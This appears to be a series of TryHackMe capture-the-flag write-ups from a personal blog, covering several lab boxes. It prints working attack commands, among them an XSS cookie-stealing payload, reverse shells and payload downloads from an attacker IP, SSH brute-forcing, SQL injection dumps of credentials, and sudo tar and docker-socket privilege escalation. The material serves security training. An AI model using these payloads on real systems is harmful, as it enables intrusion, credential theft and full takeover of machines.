You've found the real service. Solve the challenge to get access to the box Jabberwocky 'Mdes mgplmmz, cvs alv lsmtsn aowil Fqs ncix hrd rxtbmi bp bwl arul; Elw bpmtc pgzt alv uvvordcet, Egf bwl qffl vaewz ovxztiql. 'Fvphve ewl Jbfugzlvgb, ff woy! Ioe kepu bwhx sbai, tst jlbal vppa grmjl! Bplhrf xag Rjinlu imro, pud tlnp Bwl jintmofh Iaohxtachxta!' Oi tzdr hjw oqzehp jpvvd tc oaoh: Eqvv amdx ale xpuxpqx hwt oi jhbkhe-- Hv rfwmgl wl fp moi Tfbaun xkgm, Puh jmvsd lloimi bp bwvyxaa. Eno pz io yyhqho xyhbkhe wl sushf, Bwl Nruiirhdjk, xmmj mnlw fy mpaxt, Jani pjqumpzgn xhcdbgi xag bjskvr dsoo, Pud cykdttk ej ba gaxt! Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh Ewl vpvict qseux dine huidoxt-achgb! Al peqi pt eitf, ick azmo mtd wlae Lx ymca krebqpsxug cevm. 'Ick lrla xhzj zlbmg vpt Qesulvwzrr? Cpqx vw bf eifz, qy mthmjwa dwn! V jitinofh kaz! Gtntdvl! Ttspaj!' Wl ciskvttk me apw jzn. 'Awbw utqasmx, tuh tst zljxaa bdcij Wph gjgl aoh zkuqsi zg ale hpie; Bpe oqbzc nxyi tst iosszqdtz, Eew ale xdte semja dbxxkhfe.
Jdbr tivtmi pw sxderpIoeKeudmgdstd
It looks like the poem Jabberwocky, encoded/encrypted by some method: https://www.poetryfoundation.org/poems/42916/jabberwocky
Analysing the ciphertext, I guessed it might be Chaocipher or a Vigenere cipher. Cracking it through a website (https://www.boxentriq.com/code-breaking/vigenere-cipher) blew out the result:
twas brillig and the slithy toves did gyre and gimble in the wabe all mimsy were the borogoves and the mome raths outgrabe beware the jabberwock my son the jaws that bite the claws that catch beware the jubjub bird and shun the frumious bandersnatch he took his vorpal sword in hand long time the manxome foe he sought so rested he by the tumtum tree and stood awhile in thought and as in uffish thought he stood the jabberwock with eyes of flame came whiffling through the tulgey wood and burbled a
The key is thealphabetcipher. Decoding it properly with CyberChef:
'Twas brillig, and the slithy toves Did gyre and gimble in the wabe; All mimsy were the borogoves, And the mome raths outgrabe. 'Beware the Jabberwock, my son! The jaws that bite, the claws that catch! Beware the Jubjub bird, and shun The frumious Bandersnatch!' He took his vorpal sword in hand: Long time the manxome foe he sought-- So rested he by the Tumtum tree, And stood awhile in thought. And as in uffish thought he stood, The Jabberwock, with eyes of flame, Came whiffling through the tulgey wood, And burbled as it came! One, two! One, two! And through and through The vorpal blade went snicker-snack! He left it dead, and with its head He went galumphing back. 'And hast thou slain the Jabberwock? Come to my arms, my beamish boy! O frabjous day! Callooh! Callay!' He chortled in his joy. 'Twas brillig, and the slithy toves Did gyre and gimble in the wabe; All mimsy were the borogoves, And the mome raths outgrabe.
Your secret is bewareTheJabberwock
Saw that the secret is bewareTheJabberwock. After entering it, I got a set of credentials: jabberwock:ThankedDrownedSpeakWishing
SSH connects normally. Got the user flag: }32a911966cab2d643f5d57d9e0173d56{mht. It looks like a reversed string: thm{65d3710e9d75d5f346d2bac669119a23}
Privilege escalation
Opening move: sudo -l. Prepare LinPEAS. The sudo version looks odd, and the filesystem may be odd too. Found that on reboot a script is executed as the jabberwock user, and that script is writable by us, so write a reverse shell into it and reboot. After the reboot I received the shell without trouble.
Second privilege escalation
python3 -c 'import pty; pty.spawn("/bin/bash")'
Looking at the files in the home directory, they look like a bunch of hashes ...

2021-08-23 · 4 minutes · steven

Bounty Hacker (Try Hack Me Writeup)

URL : https://tryhackme.com/room/cowboyhacker
IP : 10.10.164.54
Recon
Port scan: rustscan -a 10.10.164.54 -r 1-65535
Open: 21 22 80
nmap -A -p21,22,80 10.10.164.54
FTP allows anonymous login!!
Looked at the home page: nothing much. dirsearch: nothing much either.
FTP Anonymous login
Logged in to FTP; there are two files inside, downloaded both. FTP files: the author is lin, and it looks like a password list.
Cracking the password
hydra -l 'lin' -P locks.txt ssh://10.10.164.54
Username : lin  Password : RedDr4gonSynd1cat3
SSH login succeeded; got the user flag.
Privilege escalation
Opening move: sudo -l. Found that sudo tar is allowed. Looked up tar sudo privilege escalation on GTFOBins: https://gtfobins.github.io/gtfobins/tar/#sudo
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
Privilege escalation done; got the root flag.

2021-08-19 · 1 minute · steven

Overpass 3 (Try Hack Me Writeup)

URL : https://tryhackme.com/room/overpass3hosting
IP : 10.10.208.60
Recon
First scan ports: rustscan -a 10.10.208.60
Tried FTP anonymous login: not allowed. Looked at the home page. Scanned directories: python3 dirsearch.py -u http://10.10.208.60/ and found /backups/, which holds a backup archive.
GPG decryption
Looking at the backup: wget http://10.10.208.60/backups/backup.zip. It contains two files, a gpg-encrypted file and its key.
gpg --import priv.key
gpg --output ./a.xlsx --decrypt ./CustomerDetails.xlsx.gpg
After decrypting, it is an Excel sheet:
paradox:ShibesAreGreat123
0day:OllieIsTheBestDog
muirlandoracle:A11D0gsAreAw3s0me
Brute-forcing passwords
There is a list of usernames and passwords, so I tried brute-forcing SSH with Hydra: hydra -L user.txt -P pass.txt ssh://10.10.208.60. Found that SSH does not accept password login. Tried brute-forcing FTP: hydra -L user.txt -P pass.txt ftp://10.10.208.60. Found a working pair: paradox:ShibesAreGreat123
FTP 2 Webshell
Logged in to FTP and it looks like the webroot, so I uploaded a webshell: put webshell.php. It worked!! Using the webshell, dropped a reverse shell:
http://10.10.208.60/webshell.php?A=curl%20-o%20%20/tmp/s%2010.13.21.55:8000/s
Locally: nc -nlvp 7877
http://10.10.208.60/webshell.php?A=bash%20/tmp/s
Received the reverse shell.
Privilege escalation
Upgrade to an interactive shell: python3 -c 'import pty; pty.spawn("/bin/bash")'
Find the web flag: find / -iname '*flag*' -print 2>/dev/null
Found it at /usr/share/httpd/web.flag: thm{0ae72f7870c3687129f7a824194be09d}
Prepare Linpeas: curl -o linpeas.sh 10.13.21.55:8000/linpeas.sh then bash linpeas.sh
Sudo version 1.8.29
NFS looks suspicious, but let's keep reading first: https://book.hacktricks.xyz/linux-unix/privilege-escalation/nfs-no_root_squash-misconfiguration-pe
Found a few setuid files, but none can be used. Exploiting NFS needs showmount, which is not on the box, so I uploaded my own copy: curl -o ./showmount http://10.13.21.55:8000/showmount, but running it kept failing QQ.
Found a strange file in the root directory: /.autorelabel. Sent it out with nc to look at it: cat .autorelabel > /dev/tcp/10.13.21.55/1234. It's empty QQ.
Suddenly remembered we might be able to switch user, since we have passwords from the Excel sheet: su paradox. Switched user successfully.
Second privilege escalation
Basically we guess the next step is the NFS vulnerability, but NFS did not show up in our initial port scan, so we guess it's only open locally; let's scan the local ports. Prepare an nmap binary: https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/nmap. Scanned: found NFS open on port 2049. Noticed paradox's .ssh only has a public key; ok, not much use = =. NFS is open locally but our privileges are low, so we can port-forward NFS out, using chisel: https://github.com/jpillora/chisel
curl http://10.13.21.55:8000/chisel -o chisel
chmod +x chisel
Commands:
attacker machine : ./chisel server --reverse -p 7414
target machine : ./chisel client 10.13.21.55:7414 R:2049:127.0.0.1:2049
Scan the attacker machine with nmap to see whether the tunnel really went through. Mount NFS locally: sudo mount -t nfs localhost:/ mount/. The mount succeeded. It contains the ssh key, so we can copy it out and log in directly as james over ssh. Also found the user flag. In the NFS directory mounted on the attacker machine, copy our own /bin/bash into it and chmod +s it for suid, then run it as james. Found it's still james QQ. Back on the attacker machine, chown the bash so its owner is root, and then it works!! Root flag: thm{a4f6adb70371a4bceb32988417456c44}
Learned: port forwarding, NFS privilege escalation, SUID only works with owner=root.

2021-08-18 · 2 minutes · steven

The Marketplace (Try Hack Me Writeup)

URL : https://tryhackme.com/room/marketplace
IP : 10.10.74.8
Recon
First scan ports: rustscan -a 10.10.74.8 -r 1-65535
Open: 22 80 32768
nmap -A -p22,80,32768 10.10.74.8
Looked at the home page: feels pretty cheap QQ. Scanned directories: python3 dirsearch.py -u http://10.10.74.8/ found robots.txt, login, signup.
Tried registering: meow / meow. Tried posting: the note below says files can't be posted, which feels like a planted hint. Removed the disabled attribute with F12 and tested again. Looked at robots.txt. Looked at the session: it looks very Base64: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoibWVvdyIsImFkbWluIjpmYWxzZSwiaWF0IjoxNjI5MDk5NDQwfQ.6MNSd_Wf1ytqceTjhWWGEbB4AhzTHFshHCLIeVF_Zeo
Decoded, it looks like a JWT: {"alg":"HS256","typ":"JWT"}{"userId":4,"username":"meow","admin":false,"iat":1629099440}
XSS
Found that the posting area is vulnerable to XSS. Wrote a payload to steal cookies: new Image().src="http://10.13.21.55:1234/"+document.cookie. Reported it to the admin and caught it with nc -l 1234. Received the admin's cookie: GET /token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjkxMDAxOTN9.f-eVVqF1AnFJEeuam97hn-Xz3fFNbQAJYTKrsDukzrU HTTP/1.1
Logged in with the admin account by swapping my cookie for the admin's. Home page: got Flag 1: THM{c37a63895910e478f28669b048c348d5}
SQLi
Found that the user view page allows SQL injection. After clicking into it, copied the request as curl from F12 and converted it to a Python request. After testing for a while, found that spaces have to be bypassed with /**/: "-1/**/UNION/**/SELECT/**/1,2,3,4/**/--"
Dump the DBs: p = "-1 UNION SELECT 1,group_concat(schema_name),3,4 FROM information_schema.schemata --"
Two DBs: information_schema, marketplace. Focus on the latter first.
Dump the tables: p = "-1 UNION SELECT 1,group_concat(table_name),3,4 FROM information_schema.tables where table_schema='marketplace' --"
Found three tables: items, messages, users
Dump the columns: p = "-1 UNION SELECT 1,group_concat(column_name),3,4 FROM information_schema.columns where table_schema='marketplace' --"
id,author,title,description,image,id,user_from,user_to,message_content,is_read,id,username,password,isAdministrator
What we should look at are username and password.
Select the usernames: p = "-1 UNION SELECT 1,group_concat(username),3,4 FROM marketplace.users --"
jake,meow,michael,system
Select the passwords: p = "-1 UNION SELECT 1,group_concat(password),3,4 FROM marketplace.users --"
They look hashed; tidied up roughly:
$2b$10$83pRYaR/d4ZWJVEex.lxu.Xs1a/TNDBWIUmB4z.R0DT0MSGIGzsgW
$2b$10$yaYKN53QQ6ZvPzHGAlmqiOwGt8DXLAO5u2844yUlvu2EXwQDGf/1q
$2b$10$/DkSlJB4L85SCNhS.IxcfeNpEBn.VkyLvQ2Tk9p2SDsiVcCRb4ukG
$2b$10$FStzuEGFk9JpOnigl2gbEuE2rRp27psGUS0UuztTtxbZPFW/Wtn4m
Looked it up and found it is bcrypt: https://bcrypt-generator.com/, and I can test this, since one of them is the meow account I registered myself.
Cracking the passwords: john password_hash.txt --wordlist=/opt/rockyou.txt and hashcat -m 3200 password_hash.txt rockyou.txt. Two V100s on Academia Sinica's supercomputer fully loaded would need 3 hours, which is not reasonable. Continue with SQLi: p = "-1 UNION SELECT 1,group_concat(message_content),3,4 FROM marketplace.messages --"
It spat out the following:
User Hello! An automated system has detected your SSH password is too weak and needs to be changed. You have been generated a new temporary password. Your new password is: @b_ENXkGYUCAv3zJ,<script>alert(1)</script>,Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,Thank you for your report. We have been unable to review the listing at this time. Something may be blocking our ability to view it, such as alert boxes, which are blocked in our employee's browsers.,Thank you for your report. One of our admins will evaluate whether the listing you reported breaks our guidelines and will get back to you via private message. Thanks for using The Marketplace!,Thank you for your report. We have been unable to review the listing at this time. Something may be blocking our ability to view it, such as alert boxes, which are blocked in our employee's browsers.,Thank you for your repor
Saw something that looks a lot like a password: @b_ENXkGYUCAv3zJ
SSH
We have 3 users: jake michael system. Although poking at it by hand would be enough, today I want to use Hydra: hydra -L user.txt -P password.txt ssh://10.10.74.8
The result is jake: jake : @b_ENXkGYUCAv3zJ
SSH login succeeded; got the user key: THM{c3648ee7af1369676e3e4b15da6dc0b4}
Privilege escalation
Opening move: sudo -l first. Looks like the very old sudo backup trick? If so, we only need to poke in a reverse shell: echo "bash -c 'bash -i >& /dev/tcp/10.13.21.55/7877 0>&1'" >> /opt/backups/backup.sh and call it a day, but the premise is that we need permission to modify this sh. Looks like we can't QQ, we are not michael QQ. Prepare Linpeas: wget 10.13.21.55:8000/linpeas.sh. Found sudo version 1.8.21p2: https://www.exploit-db.com/exploits/47502, but it doesn't look usable. Found a backup archive; sent it out with nc: nc -l 1234 > backup.tar and cat backup.tar > /dev/tcp/10.13.21.55/1234. It's all empty, it lied to me. Recalled that backup.sh has a * at the end; this is where tar wildcard injection applies. ref : https://mqt.gitbook.io/oscp-notes/tar-wildcard-injection. Simply put, tar strings together whatever the trailing * expands to and executes it as part of the command:
echo a > '--checkpoint=1'
echo a > '--checkpoint-action=exec=sh script.sh'
echo whoami > script.sh
Run it with michael's privileges: sudo -u michael /opt/backups/backup.sh. It works!!! Switch to michael: echo bash > script.sh
Second privilege escalation
Linpeas once more. Found that /var/run/docker.sock is writable; it even hands us the exploit tutorial directly, great: https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-docker-socket. Looked at the docker images currently in use. Changed the image name and used the exploit tutorial from hacktricks:
docker -H unix:///var/run/docker.sock run -v /:/host -it nginx chroot /host /bin/bash
docker -H unix:///var/run/docker.sock run -it --privileged --pid=host nginx nsenter -t 1 -m -u -n -i sh
Created a privileged container; privilege escalation succeeded.

2021-08-17 · 3 minutes · steven